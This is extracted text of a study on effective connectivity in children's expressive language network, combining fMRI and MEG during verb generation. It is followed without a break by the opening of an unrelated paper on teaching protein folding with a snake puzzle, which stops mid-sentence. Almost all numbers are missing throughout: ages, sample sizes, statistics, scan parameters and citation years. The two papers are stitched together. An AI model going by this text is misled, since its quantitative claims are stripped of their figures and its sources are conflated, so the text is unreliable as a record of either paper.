magnetic resonance imaging participants. the fmri cohort included typically de- veloping children ( males), ages – years (m = . , sd = . ), studied at cincinnati children’s hospital medical center (cincinnati, oh) between and . this a slightly larger cohort than initially described in holland and associates ( ), as recruitment continued beyond initial analysis and publication. all participants in the study were na- tive english speakers, free from language disability, learning disability, and neurological disorder. edinburgh handedness inventory (ehi; oldfield, ) scores indicate that were right handed, left handed, and ambidextrous. parents provided consent, and children aged years and older assented to participate. the study was approved by the hospital’s institutional review board. fmri verb generation. children alternately listened to re- cordings of concrete nouns generated by an adult female speaker (task block) or speech-frequency warble tones (control block). during the task block, children covertly generated ac- tion words corresponding to each noun. the noun stimuli were presented at a rate of once every sec, in five -sec blocks. during the control block, children were asked to simply listen to each tone. warble tones were presented every sec, in six -sec blocks. participants listened to a total of nouns and warble tones during the . min fmri recordings. functional and structural mri scanning was performed on a bruker biospec / t system (bruker medizintechnik, karlsruhe, germany). the fmri scans were acquired using a t *-weighted gradient echo epi sequence (te = msec, tr = msec, fov = · mm, slice thickness = mm). at each of the time points, slices were acquired. the initial time points (corresponding to a control block) were discarded to allow protons to reach t relaxation equilib- rium. a t -weighted whole brain structural image was acquired using a d mdeft scan (te = . msec, tr = . msec, voxel size = . · . · . mm). magnetoencephalography participants. the meg cohort included typically de- veloping children ( males), ages – years (m = . , sd = . ), scanned at the hospital for sick children (tor- onto, on) between and . this a subset of partici- pants described in kadis and associates ( ); only subjects with structural mris of sufficient quality for automated seg- mentation and single-shell head modeling in spm were in- cluded in this study (see forward modeling description mapping effective connectivity with fmri-constrained meg under ‘‘extraction of nodal time courses from meg data’’ section, below). participants were native english speakers, negative for history of neurological disorder, learning disabil- ity, and language disturbance. children showed a typical distribution of hand preference, with right handed and ambidextrous, based on ehi scores. parents provided consent, and children and adolescents assented to participate. the study was approved by the hospital’s research ethics board. meg verb generation. participants alternately viewed color pictures of everyday objects (task condition) or scrambled color images with a superimposed central fixation cross (con- trol condition). task stimuli were presented for msec, and control stimuli were presented for – msec (jit- tered). the order of presentation was random within each con- dition. for the task condition, children were required to covertly generate a verb for each object viewed, as quickly as possible. for the control condition, children were asked to look at the central fixation cross. overt assessment following meg acquisition showed that all participants were able to per- form the task, and children aged – had a mean accuracy of % across trials. meg scanning was performed on a -channel whole- head ctf system ( meg international services ltd., coqui- tlam, bc, canada). subjects were tested in the supine position, with the projection screen positioned above the lower face and neck region, for comfortable viewing. stimuli were presented within – � of the center of the visual field to promote foveal projection. head localization coils were placed at nasion and preauricular points to monitor move- ment. data were acquired at hz, with an online - hz low-pass filter. in all cases, head displacement was less than mm from the beginning to end of acquisition. to facil- itate meg-mri coregistration (required for accurate forward modeling in source analyses), multimodal radiographic markers were placed at the nasion and preauricular positions before acquiring structural images. mri was conducted on a ge signa advantage . t scanner (ge medical, milwaukee, wi). a whole brain t -weighted image was acquired using a d-spgr scan (te = . msec, tr = msec, voxel size = . · . · . mm). analyses fmri analyses. image preprocessing and first-level ana- lyses were carried out using the cincinnati children’s hos- pital image processing software (cchips; schmithorst and dardzinski, ). epi data were corrected for geomet- ric distortion due to b field inhomogeneity (schmithorst et al., ) and coregistered to minimize motion effects (thevenaz et al., ). an experienced rater identified land- marks on each subject’s structural image, which were used to linearly transform structural and functional data to a standard space (talairach and tournoux, ). functional data were cross correlated with a reference waveform reflecting the time course of task and control blocks, and a t-statistic (verbs minus tones) was computed on a voxel-wise basis. second-level analyses were carried out in spm (www .fil.ion.ucl.ac.uk/spm/) running in matlab r a (the mathworks, inc., natick, ma). individual contrast images were submitted to group analyses in a single sample t test. we identified brain regions showing significantly increased acti- vation for verb generation, using a family-wise error correc- tion of p < . and clustering threshold of k = voxels. parcellation of the activation map. as an initial step to in- terrogating the distributed expressive language network for patterns of effective connectivity, we parcellated the group map and established a set of cortical node locations. the group activation map was normalized to the mni subject average t -weighted image template and binarized such that only suprathreshold voxels were retained. we cropped the resulting activation map using a gray matter mask (to isolate cortex; mask supplied with spm ), resampled the image to . mm isotropic, and multiplied the activation by a random, -unit parcellation scheme (provided as a . mm isotropic image) recently introduced by craddock and associates ( ). centroids of cortical parcels with > active voxels serve as network nodes. the -unit parcellation scheme provides a good trade-off between anatomical interpretabil- ity and functional homogeneity (craddock et al., ), and the node density approximates the specificity of our sub- sequent beamformer analyses (i.e., limited by the under de- terminacy of the inverse; source analyses described below). extraction of nodal time courses from meg data. pre- processing was carried out using fieldtrip (oostenveld et al., ) in matlab r a. each participant’s meg recording was imported and epoched from � to msec, relative to the onset of target picture presentation. trials were baseline corrected (using the � to msec window as a baseline), and power line noise was attenuated using a -hz discrete fourier transform filter. scanner jump artifacts were automatically identified and trials containing artifacts rejected from each dataset. forward modeling was conducted in spm . each sub- ject’s t -weighted mri was imported, segmented, and then warped to the mni template to establish a normal- ization deformation field. the source model was constructed from a standard -vertex cortical mesh that was warped to the individual subject’s cortex using the inverse of the deformation. fiducial locations were manually identified on each subject’s structural mri, facilitating coregistration with meg data. finally, realistic single-shell head models were constructed from the segmented images and lead fields computed using default conductivity parameters. the neuronal activity at each network node was com- puted using fieldtrip’s linearly constrained minimum vari- ance beamformer (with . % regularization, for spheres of mm radius), implemented in spm . trial data were then cropped to – msec from picture onset, to isolate neu- romagnetic changes reflecting the generative period of the expressive language task (kadis et al., ) in subsequent connectivity analyses. effective connectivity analyses. we estimated effective connectivity between each pair of network nodes using the psi metric, recently introduced by nolte and associates ( ; see also, nolte and müller, ; haufe et al., ). psi is computed from the complex coherency func- tion for a pair of signals, and directionality is determined from phase differences in signals over a specified frequency range. when signal i drives (is driven by) signal j, the mean phase differences between i and j will increase (decrease) kadis et al. with frequency and psi will be positive (negative). for con- venience, psi is often reported as a normalized value, obtained through division by an estimate of standard devia- tion (here, jackknife resampling was used). the normalized value, psinorm, can then be interpreted as any z-value would, facilitating statistical thresholding and group-wise quantitation. in the current study, we computed psinorm for each node pair within canonical bands (delta, * – hz, low frequency limited by time window; theta, – hz; alpha, – hz; beta, – hz; and gamma, – hz) for each subject. to iden- tify significant connections, data are thresholded at psinorm ‡ . . the value of – . corresponds to the critical value in a two-tailed normal deviate (z) test conducted at alpha = . ; because the psi metrics for any given node pair are an addi- tive inverse (i.e., the psi for signal i driving j is the nega- tive of psi for j driving i), only one direction of flux need be considered. results network definition group analyses of the fmri data revealed consistent acti- vation across individuals in bilateral frontal (including in- sular cortex) and posterior temporal regions, and the left anterior cingulate and right occipital cortices. as expected, the activation encompasses canonical language regions of the left hemisphere (i.e., broca’s and wernicke’s areas) and, to a lesser extent, their right hemisphere homologues. occipital activation has been previously noted in this task and likely relates to visualization associated with the stimu- lus and response (i.e., visualization of the everyday object and/or associated activities). group activation is shown in figure . the parcellation procedure yielded cortical network nodes. of these, were located in the left hemisphere, with the largest cluster focused around the inferior, middle, and superior frontal cortices. the application of a -unit random parcellation scheme and the resulting set of network nodes are depicted in figure . node coordinates and their anatomical labels are presented in supplementary table s (supplementary data are available online at www.liebertpub .com/brain). density of effective connections subjects had between and (m = . , sd = . ) supra- threshold effective connections among network nodes, summed across all frequency bands. the number of surviv- ing connections did not differ among frequency bands ( p > . ). age-related changes in density of effective connec- tions. the total number of suprathreshold connections was positively and linearly correlated with subject age (r = . , n = , p £ . ), suggesting that older children and adoles- cents meaningfully engage a greater portion of the distrib- uted network during verb generation than younger children do (figure ). within any particular frequency band, the number of surviving effective connections failed to correlate with age ( p > . , uncorrected; supplementary fig. s ). patterns of effective connectivity across frequency spectra to characterize frequency-related differences in patterns of information flux during verb generation in children, we plotted suprathreshold effective connections for each fre- quency bin across all subjects on a template brain (fig. ). we observed distinct patterns of information flux across the spectra. in general, low-frequency information flux was focused within the left frontal region; at higher frequencies, effective connectivity was increasingly observed between distal nodes. within the delta band, information flux was predominantly rostrally directed and focused among proximal nodes of the left inferior and middle frontal gyri. in the theta band, the spa- tial distribution of suprathreshold connections was somewhat broader. we observed a high density of effective connections be- tween putative wernicke’s and broca’s areas in the theta, beta, and gamma bands, which were predominantly rostrally directed. in the alpha, beta, and gamma bands, we observed signif- icant interhemispheric effective connectivity. in alpha and beta, bidirectional information transfer was observed be- tween left and right frontal nodes and between left and right posterior temporal nodes. in gamma, the right posterior temporal region emerged as an important driver of both left fig. . group fmri acti- vation for verb generation. colored areas depict signifi- cant fmri activation in children performing verb generation in fmri, projected on a template brain ( p < . , fwe corrected; minimum clustering threshold of k = voxels of . · . · . mm dimension). fmri, functional magnetic resonance imaging. mapping effective connectivity with fmri-constrained meg posterior temporal (wernicke’s) and left frontal (broca’s) re- gions, although this region appears to be driven by the left posterior region at lower frequencies. across frequency bins, we observed significant informa- tion flux between wernicke’s and broca’s areas. however, only minimal effective connectivity was observed between right posterior temporal and right frontal regions, indicating that the right hemisphere language homologues do not sim- ply mirror the function/connectivity of the canonical lan- guage regions in typically developing children. discussion in this study, we integrated fmri and meg data to characterize information flux within the distributed pediatric expressive language network. the approach extends the con- ventional analysis of task-related changes in bold signal or oscillatory power in fmri and meg; in this study, we map function through patterns of significant effective connectiv- ity, estimated from fast recordings of neuronal population activity. the framework can be easily generalized to charac- terize cortical transmission of information for other cogni- tive domains. the parcellation and meg analysis approach could also be used to interrogate any arbitrarily defined brain network for patterns of effective connectivity (e.g., as- sess information flux within a theoretically derived network defined by anatomical boundaries), in the absence of avail- able fmri data. using thresholded normalized psi to identify regions of significant information flux, we clearly resolved a core left frontal subnetwork consisting of nodes in the inferior, middle, and superior frontal gyri and insula, which support verb generation (expressive language) in our pediatric sam- ple. although some degree of suprathreshold connectivity was observed between all nodal regions, only the left frontal regions showed significant information flux at all frequency bands studied. this preferential localization is consistent fig. . parcellation and definition of the functional network. (a) depiction of parcellation scheme in axial slices; each colored patch represents a distinct parcel; the centroids of active parcels are used to define network node locations. (b) the resulting nodes are depicted as colored spheres on a template brain; left hemisphere nodes (n = ) are shown in blue and right hemisphere nodes (n = ) are shown in red. fig. . age-related increase in number of significant ef- fective connections. for each subject, the number of signifi- cant effective connections was summed across all frequency bands. plot shows the significant age-related increase in the total number of suprathreshold (psinorm ‡ . ) effective connections observed within the distributed network (r = . , n = , p £ . ). psi, phase slope index. kadis et al. with the earliest accounts of expressive language disturbance following left inferior frontal injury (e.g., broca, ; see also, dronkers, ) and subsequent clinically informed models of gross language representation championed by geschwind ( , ). localization is also consistent with previous neuroimaging studies of expressive language in both children (e.g., karunanayaka et al., , ) and adults (e.g., mccarthy et al., ; szaflarski et al., ). in general, the left inferior and middle frontal cortex has been implicated in semantic processing and word retriev- al; the insular cortex is involved in speech or articulatory planning (price, ). uniquely, we observed changing patterns of effective connectivity among the network nodes, depending on the frequency analyzed. in the delta band, rostrally directed effective connections were focused within the left frontal nodes. progressing through theta, alpha, and beta bands, we see a transition to predominantly caudally directed con- nections among the same nodes. findings highlight the var- iable nature of information flow that can occur among a fixed set of nodes, at different frequencies. similarly, we observed changes in the spatial distribution of information flux across the spectra. in the delta and theta bands, we observe effective connectivity primarily between proximal left inferior frontal nodes; in the alpha and beta bands, we see increasing in- volvement of midline regions, and at beta and gamma, we observe bilateral posterior temporal nodes emerging as im- portant drivers in the network. these spectrally resolved changes in patterns of information flux cannot be resolved in conventional neuroimaging. we expect that increased ac- cess to meg for studying language will necessitate updates to the current network models, to account for the distinct pat- terns of connectivity that occur at various timescales. across frequency bands, the total number of suprathres- hold effective connections was found to increase with age in our pediatric sample. the finding initially appears to run counter to the established literature showing relatively bilat- eral and extensive representation in the youngest children (e.g., szaflarski et al., ; kadis et al., ). however, we propose that patterns of significant information flux re- veal the core components of a network—those regions that are engaged in a consistent coordinated manner and are nec- essary for function—reflecting the neural strategy used for task completion. we do not expect developmental changes in effective connectivity to track with developmental changes in task-related bold signal or oscillatory power distribution. collectively, the data suggest that young chil- dren possess a broadly distributed expressive language net- work, as evidenced from conventional neuroimaging, with relatively few core (vulnerable) nodes. relative plasticity for language representation in young children is possible be- cause the broader network lacks established core nodes. with development, the extent of the overall network decreases, while patterns of information flux become entrained. a left lateralized, focal, core expressive language network emerges as part of the normal developmental trajectory, and plasticity is diminished. in the future, we hope to assess the stability of these connectivity patterns through adulthood. in this study, fmri data served as a ‘‘hard constraint’’ on subsequent meg effective connectivity analyses. by ap- plying an activation map that was established through large-scale investigation, we unambiguously focus on brain regions known to undergo task-related hemodynamic changes during verb generation in children. parcellation of the fmri activation map serves to reduce the number of comparisons needed to characterize information flux. we fig. . effective connec- tivity within canonical fre- quency bands. significant node-to-node effective con- nections are represented as green arrows, which indicate the direction of information flow. the thickness of each arrow reflects the relative frequency of suprathreshold effective connectivity across subjects. mapping effective connectivity with fmri-constrained meg preferred a multimodal approach over unimodal meg, since methods used to identify language cortex in fmri have been relatively well established and the extent of cortex involved is easily interpreted from an activation map. in contrast, the choice of source localization approach in meg will impact ensuing functional maps and most attempts to solve the in- verse solution produce localizations that are difficult to in- terpret in terms of extent (e.g., equivalent current dipole analysis, beamforming). the tasks used in each imaging modality were highly similar, but not identical. in fmri, auditory noun stimuli were used; in meg, pictures of everyday objects were pre- ferred. according to current language models, the auditory or visual stimuli preferentially engage their respective sensory cortices; however, both versions of the task will ul- timately require engagement of a broader stimulus modality- independent language network necessary for semantic processing, word retrieval, and articulatory planning related to verb generation (price, ). since the broad activation map was defined using an auditory fmri paradigm, and ef- fective connectivity was assessed from meg data collected using a visual paradigm, the resulting effective connectivity map should reflect only the elements of the expressive lan- guage network that are modality nonspecific. in this way, we isolate the language-specific subprocesses involved in verb generation. in the current analyses, we study information flux occur- ring between node pairs, without imparting any theoretical or anatomical restrictions on where network edges may be established. the data-driven approach is objective, but could potentially yield connectivity maps that do not reflect the underlying physiological structure of the language net- work. with the current approach, it is indeed possible to observe significant information flux between two regions that are not directly connected by any known fiber pathway. furthermore, we limited our analyses to regions shown ac- tive in large-scale fmri analyses; it is possible that nodes re- siding outside the defined network could also be involved in expressive language processing, particularly in individual subjects. these connections could not be resolved in the cur- rent analyses. it is important to note that the psi metric requires specifi- cation of both time and frequency ranges for computation. in this study, we cropped our data to a time window known to be relevant for verb generation in children (kadis et al., ) and restricted analyses to within canonical frequency bands. had we assessed phase slope across the broadband data, we would have failed to capture the changing direction of information flux among left frontal nodes and missed the changing patterns of connectivity that occur across the spec- tra. the choice of temporal and spectral window is not triv- ial; with additional experience, we anticipate proposing guidelines so researchers can make informed decisions about the parameters used in effective connectivity analyses with psi and related metrics. we are currently investigating other methods to integrate fmri and meg data, to map core language sites in healthy children and those undergoing investigations for epilepsy surgery. with continued development of multimodal neuro- imaging and connectivity analyses, we will gain access to a better understanding of normal language development, plas- ticity, and representation in the brain. acknowledgments the fmri data were obtained through support from the national institute of child health and human development (r -hd ; s.k.h.), and the meg data were obtained through support from the university of toronto (d.s.k./ m.l.s.). the authors wish to acknowledge akila rajagopal and thomas maloney for their technical assistance with the study. author disclosure statement no competing financial interests exist. references ballantyne ao, spilkin am, hesselink j, trauner da. . plasticity in the developing brain: intellectual, language and academic functions in children with ischaemic perinatal stroke. brain : – . bates e, reilly j, wulfeck b, dronkers n, opie m, fenson j, et al. . differential effects of unilateral lesions on lan- guage production in children and adults. brain lang : – . branch c, milner b, rasmussen t. . intracarotid sodium amytal for the lateralization of cerebral speech dominance; observations in patients. j neurosurg : – . brazdil m, zakopcan j, kuba r, fanfrdlova z, rektor i. . atypical hemispheric language dominance in left temporal lobe epilepsy as a result of the reorganization of language functions. epilepsy behav : – . broca pp. . remarques sur le siége de la faculté du langage articulé, suivies d’une observation d’aphémie (perte de la pa- role). bulletin de la société anthropologique : – . brown tt, lugar hm, coalson rs, miezin fm, petersen se, schlaggar bl. . developmental changes in human cere- bral functional organization for word generation. cereb cor- tex : – . craddock rc, james ga, holtzheimer pe, rd, hu xp, mayberg hs. . a whole brain fmri atlas generated via spatially constrained spectral clustering. hum brain mapp : – . geschwind n. . the organization of language and the brain. science : – . geschwind n. . language and the brain. sci am : – . gummadavelli a, wang y, guo x, pardos m, chu h, liu y, et al. . spatiotemporal and frequency signatures of word recognition in the developing brain: a magnetoencepha- lographic study. brain res : – . haufe s, nikulin vv, muller kr, nolte g. . a critical as- sessment of connectivity measures for eeg data: a simula- tion study. neuroimage : – . helmstaedter c, kurthen m, linke db, elger ce. . patterns of language dominance in focal left and right hemisphere ep- ilepsies: relation to mri findings, eeg, sex, and age at onset of epilepsy. brain cogn : – . holland sk, plante e, weber byars a, strawsburg rh, schmi- thorst vj, ball ws, jr. . normal fmri brain activation patterns in children performing a verb generation task. neu- roimage : – . holland sk, vannest j, mecoli m, jacola lm, tillema jm, karunanayaka pr, et al. . functional mri of language lateralization during development in children. int j audiol : – . kadis et al. jacola lm, schapiro mb, schmithorst vj, byars aw, straws- burg rh, szaflarski jp, et al. . functional magnetic res- onance imaging reveals atypical language organization in children following perinatal left middle cerebral artery stroke. neuropediatrics : – . kadis ds, iida k, kerr en, logan wj, mcandrews mp, ochi a, et al. . intrahemispheric reorganization of language in children with medically intractable epilepsy of the left hemi- sphere. j int neuropsychol soc : – . kadis ds, kerr en, rutka jt, snead oc, rd, weiss sk, smith ml. . pathology type does not predict language lateral- ization in children with medically intractable epilepsy. epi- lepsia : – . kadis ds, pang ew, mills t, taylor mj, mcandrews mp, smith ml. . characterizing the normal developmental trajectory of expressive language lateralization using magne- toencephalography. j int neuropsychol soc : – . kadis ds, smith ml, mills t, pang ew. . expressive lan- guage mapping in children using meg; meg localization of expressive language cortex in healthy children: application to paediatric clinical populations. down syndr q : – . karunanayaka p, schmithorst vj, vannest j, szaflarski jp, plante e, holland sk. . a group independent component analysis of covert verb generation in children: a functional magnetic resonance imaging study. neuroimage : – . karunanayaka p, schmithorst vj, vannest j, szaflarski jp, plante e, holland sk. . a linear structural equation model for covert verb generation based on independent com- ponent analysis of fmri data from children and adolescents. front syst neurosci : . mccarthy g, blamire am, rothman dl, gruetter r, shulman rg. . echo-planar magnetic resonance imaging stud- ies of frontal cortex activation during word generation in humans. proc natl acad sci u s a : – . nolte g, muller kr. . localizing and estimating causal re- lations of interacting brain rhythms. front hum neurosci : . nolte g, ziehe a, nikulin vv, schlogl a, kramer n, brismar t, et al. . robustly estimating the flow direction of infor- mation in complex physical systems. phys rev lett : . oldfield rc. . the assessment and analysis of handedness: the edinburgh inventory. neuropsychologia : – . oostenveld r, fries p, maris e, schoffelen jm. . fieldtrip: open source software for advanced analysis of meg, eeg, and invasive electrophysiological data. comput intell neuro- sci : . pang ew, wang f, malone m, kadis ds, donner ej. . local- ization of broca’s area using verb generation tasks in the meg: validation against fmri. neurosci lett : – . price cj. . a review and synthesis of the first years of pet and fmri studies of heard speech, spoken language and reading. neuroimage : – . rasmussen t, milner b. . the role of early left-brain injury in determining lateralization of cerebral speech functions. ann n y acad sci : – . reilly js, bates ea, marchman va. . narrative discourse in children with early focal brain injury. brain lang : – . ressel v, wilke m, lidzba k, lutzenberger w, krageloh-mann i. . increases in language lateralization in normal chil- dren as observed using magnetoencephalography. brain lang : – . saltzman-benaiah j, scott k, smith ml. . factors associ- ated with atypical speech representation in children with in- tractable epilepsy. neuropsychologia : – . satz p, strauss e, wada j, orsini dl. . some correlates of intra- and interhemispheric speech organization after left focal brain injury. neuropsychologia : – . schmithorst vj, dardzinski b. . cchips/idl enables de- tailed mri analyses. schmithorst vj, dardzinski bj, holland sk. . simultane- ous correction of ghost and geometric distortion artifacts in epi using a multiecho reference scan. ieee trans med imag- ing : – . szaflarski jp, holland sk, schmithorst vj, byars aw. . fmri study of language lateralization in children and adults. hum brain mapp : – . talairach j, tournoux p. . co-planar stereotaxic atlas of the human brain: -dimensional proportional system: an approach to cerebral imaging. new york: thieme. thevenaz p, ruttimann ue, unser m. . a pyramid ap- proach to subpixel registration based on intensity. ieee trans image process : – . tillema jm, byars aw, jacola lm, schapiro mb, schmithorst vj, szaflarski jp, et al. . cortical reorganization of lan- guage functioning following perinatal left mca stroke. brain lang : – . vargha-khadem f, watters gv, o’gorman am. . devel- opment of speech and language following bilateral frontal le- sions. brain lang : – . address correspondence to: darren s. kadis pnrc and division of neurology cincinnati children’s hospital medical center burnet avenue cincinnati, oh e-mail: darren.kadis@cchmc.org mapping effective connectivity with fmri-constrained meg submitted june accepted october published december corresponding author alberto pascual-garcía, alberto.pascual.garcia@gmail.com, apascual@ic.ac.uk academic editor rahul shah additional information and declarations can be found on page doi . /peerj-cs. copyright nido et al. distributed under creative commons cc-by . open access learning structural bioinformatics and evolution with a snake puzzle gonzalo s. nido , ,*, ludovica bachschmid-romano ,*, ugo bastolla and alberto pascual-garcía , department of neurology, bergen university, bergen, norway department of clinical medicine, bergen university, bergen, norway department of artificial inteligence, technische universität berlin, berlin, germany centro de biología molecular ‘‘severo ochoa,’’ universidad autónoma de madrid, madrid, spain department of life sciences, imperial college london, ascot, berkshire, united kingdom * these authors contributed equally to this work. abstract we propose here a working unit for teaching basic concepts of structural bioinformatics and evolution through the example of a wooden snake puzzle, strikingly similar to toy models widely used in the literature of protein folding. in our experience, developed at a master’s course at the universidad autónoma de madrid (spain), the concreteness of this example helps to overcome difficulties caused by the interdisciplinary nature of this field and its high level of abstraction, in particular for students coming from traditional disciplines. the puzzle will allow us discussing a simple algorithm for finding folded solutions, through which we will introduce the concept of the configuration space and the contact matrix representation. this is a central tool for comparing protein structures, for studying simple models of protein energetics, and even for a qualitative discussion of folding kinetics, through the concept of the contact order. it also allows a simple representation of misfolded conformations and their free energy. these concepts will motivate evolutionary questions, which we will address by simulating a structurally constrained model of protein evolution, again modelled on the snake puzzle. in this way, we can discuss the analogy between evolutionary concepts and statistical mechanics that facilitates the understanding of both concepts. the proposed examples and literature are accessible, and we provide supplementary material (see ‘data availability’) to reproduce the numerical experiments. we also suggest possible directions to expand the unit. we hope that this work will further stimulate the adoption of games in teaching practice. subjects bioinformatics, computational biology, computer education, scientific computing and simulation keywords structural bioinformatics, education, protein folding, statistical mechanics, contact matrix, protein structure alignment, designability, evolution, contact order, protein classification introduction scientific knowledge is becoming increasingly interdisciplinary, with life sciences being one of the most significant examples. this field has attracted experts from different areas and backgrounds, as foreseen by schrödinger’s seminal book ‘‘what is life?’’ (schrödinger, ). in fact, life sciences offer a very interesting ground for the application of formal methods originated in other disciplines such as physics or informatics, allowing to address how to cite this article nido et al. ( ), learning structural bioinformatics and evolution with a snake puzzle. peerj comput. sci. :e ; doi . /peerj-cs. https://peerj.com mailto:alberto.pascual.garcia@gmail.com mailto:apascual@ic.ac.uk https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://dx.doi.org/ . /peerj-cs. biological questions from different perspectives (lazebnik, ). in recent years, the spectacular increase of biological data promoted by high-throughput technologies boosted the development of computational tools for its analysis and classification, an essential task in itself (dougherty & braga-neto, ). we are witnessing the growth of a theoretical biology with formal parallelism with other disciplines and with the objective to identify the underlying general principles of biological systems. this scenario challenges the traditional educational programs (gallagher et al., ), often reluctant to overcome the boundaries between established disciplines. in contrast, we observe a rapid growth of interdisciplinary publications in the scientific literature, which contributes to bolster and further extend the gap between research and education. as a result, it is common that students with different backgrounds meet in the same postgraduate courses, but they often lack the skills required to work in such an integrative environment. together with the limited number of teaching hours, this situation constitutes a serious bottleneck to learning. hence, it is of great importance to find tools that help to bridge the gap between different backgrounds and favour a learning convergence (fox & ouellette, ). games can help students to assimilate abstract concepts and to address complex problems. there is a growing number of games related with topics as diverse as protein folding (cooper et al., ), spin glasses (hartmann, ), ecological networks (fortuna et al., ), biological data integration (schneider & jimenez, ), geometry (o’rourke, ) or scientific induction (gardner, ), to name a few. here we present an illustrative example where we employed a wooden snake puzzle in a structural bioinformatics course at the universidad autónoma de madrid (spain). this puzzle can be regarded as a coarse grained (toy) model of a polymer structure and it is strikingly similar to simplified mathematical models proposed in the protein folding literature (see, for instance, Šali, shakhnovich & karplus, ). we propose several exercises accessible to students with a graduate-level background in either biology or physics and notions in programming. our goal consists in giving concreteness to the subjects presented in the course through a physical object, and our experience in this sense is very positive. this example allows us to discuss the first steps in the modeling process, i.e., the definition of the system and its epistemological and practical consequences, a discussion that is often neglected. relying on a physical object allows us to provide a first intuitive contact with the different subjects that we treat, ranging from computational techniques, such as protein structure alignment algorithms, to theoretical concepts, such as protein folding and evolution. we argue that starting from these examples allows the lecturer to introduce more complex problems, in which real examples might be considered. we suggest along the unit different questions that may be followed to expand a course. one important aspect in which we focused in the development of these problems is the intimate relation between physics and evolution. adapting the famous quote of theodosius dobzhansky, the properties of natural proteins only make sense in the light of evolution and, conversely, the properties of protein evolution only make sense considering the constraints imposed by protein physics (liberles et al., ). furthermore, there is a deep analogy between the statistical mechanics in the space of protein conformations, which nido et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. governs protein folding, and the statistical mechanics in the space of protein sequences, which emerges from evolution (sella & hirsh, ). the paper is organized as follows. firstly, we present the analogy between the snake puzzle and the contact matrix representation of protein structures, and we propose a simple algorithm to solve the puzzle. the solutions are then adopted as a set of representative model structures, on which we propose computational exercises focused on evolutionary concepts. throughout the paper we suggest several discussions that are stimulated by the analogy between the computational results and real proteins, proposing chosen references that are easy to handle by postgraduate students. finally, we provide as supplementary material (see ‘data availability’) the input data needed to reproduce all the numerical experiments and the source code to execute some of them. proposed exercises puzzle description: visualization and analogies with protein structures the snake puzzle consists of a wooden chain of n blocks that must be folded into a cube. each element of the chain, except the first and the last one, is linked to two others. three linked units are constrained to form either a straight line or a turn that extends into two dimensions. there are at least two versions of the puzzle in different sizes, available in retail stores and online shops. the first version is a -unit puzzle that folds into a cube of side , and the second one is a -unit puzzle that folds into a cube of size . in accordance with the nomenclature used in the literature on polymer physics, we will refer to the former as -mer model and as -mer to the latter. the exercises proposed in the following sections are based on the -mer puzzle, which is more complex while remaining computationally tractable. our proposal is inspired by the similarity between this puzzle and the lattice models of protein structures studied in the literature (the relevant references will be presented all throughout the text). the number of possible polymer conformations on the cubic lattice is huge. taking into account the self-avoiding condition that two units cannot occupy the same cell, each new unit can be placed in at most different cells. each time that the length increases the number of conformations is multiplied by a roughly constant factor, leading to an exponential increase. numerical computations show that the number of self-avoiding walks on the cubic lattice scales as nγµn for large n , with µ≈ . (bellemans, ), close to the maximum possible value, so that the number of conformations of a -mer is of the order of ∼ . the enormousness of these numbers offers the opportunity to introduce the well known levinthal’s paradox (levinthal, ) as a starting point for a course focused on protein folding. inlatticemodelsofproteinfoldingitisoftenassumedthatfoldedproteinsarerepresented by maximally compact conformations. in the case of the -mer, these are conformations that occupy the × × cube. this number also increases exponentially, although with a smaller exponent whose asymptotic value can be computed analytically, for instance it is µ= /e ≈ . on the cubic lattice (pande et al., ). thus the number is huge nido et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure conformations of the -mer and -mer. (a): maximally compact conformations. (b): partly open conformation that illustrates the similarity between the model and two protein domains connected through a hinge. (c): fully extended conformations, where one can see the consecutive rigid fragments of size and (for the -mer) and size ( -mer). (of the order of for the -mer). an algorithm to generate exhaustively all maximally compact conformations of the -mer model was proposed in shakhnovich & gutin ( ). with respect to these numbers, the puzzle presents a huge reduction of the conformation space due to the constraints on the direction that each step can take. indeed, linearly arranged consecutive units can be regarded as a single rigid fragment of size , or ( -mer) and , , or ( -mer). these rigid blocks can be easily seen in fig. c. the number of fragments is much smaller than the number of units. in addition, two consecutive rigid fragments have only four self-avoiding conformations (two consecutive fragments cannot extend in the same dimension). consequently, due to these constraints the -mer puzzle has access to only ∼ conformations. nevertheless, it is still remarkably difficult to solve it without computational help. this reduction in the order of magnitude of the number of conformations offers an opportunity to discuss how the secondary structure of proteins limits the number of different folded structures, and how secondary structure prediction helps predicting protein structure from sequence. furthermore, different fragments of the puzzle are sometimes assembled into higher order structures reminiscent of structures found in real proteins. for instance, the -merhas two consecutive blocks of size that cannot be folded unless they are placed in parallel next to each other. this configuration is remarkably similar to the nido et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. naturally occurring beta sheet secondary structure. the constraints that this folding entails subdivide the puzzle into two structurally independent modules joined by what resembles a protein hinge (see fig. b). on the other hand, there are long regions of consecutive blocks of length that can provide the opportunity to discuss the role of more flexible regions in real proteins such as large loops or intrinsically unstructured regions. solutions of the puzzle after this preliminary descriptive analysis of the puzzle we propose the first computational exercise, which consists in programming a search algorithm that generates all the maximally compact conformations (i.e., the solutions of the snake puzzle folded in a cube). the solution that we describe in ‘materials and methods’ starts from one end of the chain and exhaustively builds all the conformations of the blocks of the puzzle that fit into a cube of size (for the -mer) or ( -mer). we provide the source code along with the algorithm as supplementary material (see ‘data availability’) to the present paper. it has to be noted that the time taken by our search algorithm grows exponentially with the number of fragments, in accordance with a recent work that shows that the snake puzzle is an np-complete problem (abel et al., ), i.e., loosely speaking, a problem that cannot be solved exactly by any algorithm whose computation time grows only polynomially with system size. thus, while it would be impossible to apply this algorithm to much larger systems, modern computers are readily capable of handling the calculations for the -mer. stochastic algorithms can find solutions in shorter times at the expense of an exhaustive exploration, and they are of interest in the context of protein folding. to characterize the bottlenecks of the search algorithm, we monitor in which regions of the puzzle the exhaustive search spends more time. in fig. we plot the histogram of the number of times a fragment is visited during two exhaustive searches that start from the two ends of the chain. to understand the relationship between the search and the constraints imposed by the fragments, we depict in the histogram the position of the rigid fragments of size larger than two. we observe that there is an intense search around the regions where many consecutive small fragments accumulate. on the other hand, the search is drastically reduced when the algorithm finds large consecutive fragments (see, for instance, the two rigid fragments of size separated by a fragment of size ) because there are few possible conformations compatible with valid spatial coordinates. it is interesting to observe that the number of steps needed to find the solutions varies depending on the end of the chain from which the algorithm starts. this observation suggests that the puzzle may be solved faster if we start the 